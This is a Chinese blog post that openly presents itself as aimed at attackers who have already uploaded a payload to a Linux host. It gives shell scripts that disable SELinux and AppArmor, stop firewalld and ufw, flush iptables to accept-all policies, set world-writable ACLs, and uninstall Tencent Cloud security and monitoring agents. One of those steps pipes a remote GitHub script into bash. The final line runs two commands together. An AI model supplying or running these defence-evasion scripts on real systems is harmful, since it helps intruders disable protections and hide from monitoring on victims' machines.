本文介绍了在Linux系统中临时关闭关键安全模块(如SELinux和AppArmor)以及防火墙(firewalld、ufw和iptables)的方法,还包括修改访问控制列表和卸载监控Agent的过程,以供恶意行为者在尝试黑入时使用。
一关闭关键linux安全模块
在尝试黑入Linux时,能上传pyload后,可以试试关闭Linux系统的关键安全模块,如SELinux和AppArmor。
# 禁用SELinux
if getenforce != "Disabled"; then
echo "Disabling SELinux..."
setenforce 0
sed -i 's/^SELINUX=enforcing$/SELINUX=disabled/' /etc/selinux/config
sed -i 's/^SELINUX=permissive$/SELINUX=disabled/' /etc/selinux/config
fi
# 禁用AppArmor
if systemctl is-active --quiet apparmor; then
echo "Disabling AppArmor..."
systemctl stop apparmor
systemctl disable apparmor
fi
echo "Security modules have been disabled."
二关闭防火墙shell脚本
#!/bin/bash
echo "Attempting to stop and disable the firewall..."
if systemctl is-active --quiet firewalld; then
echo "Stopping and disabling firewalld..."
systemctl stop firewalld
systemctl disable firewalld
fi
# For systems using ufw
if systemctl is-active --quiet ufw; then
echo "Disabling ufw..."
ufw disable
fi
# For systems using iptables
echo "Flushing iptables rules..."
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
三修改访问控制列表
FILE="/home/xxx/"
# 设置ACL,允许所有用户读、写和执行该文件
setfacl -m u::rwx "$FILE"
setfacl -m g::rwx "$FILE"
setfacl -m o::rwx "$FILE"
四卸载监控 Agent
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.shwget -qO- https://raw.githubusercontent.com/littleplus/TencentAgentRemove/master/remove.sh | bash
5536
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
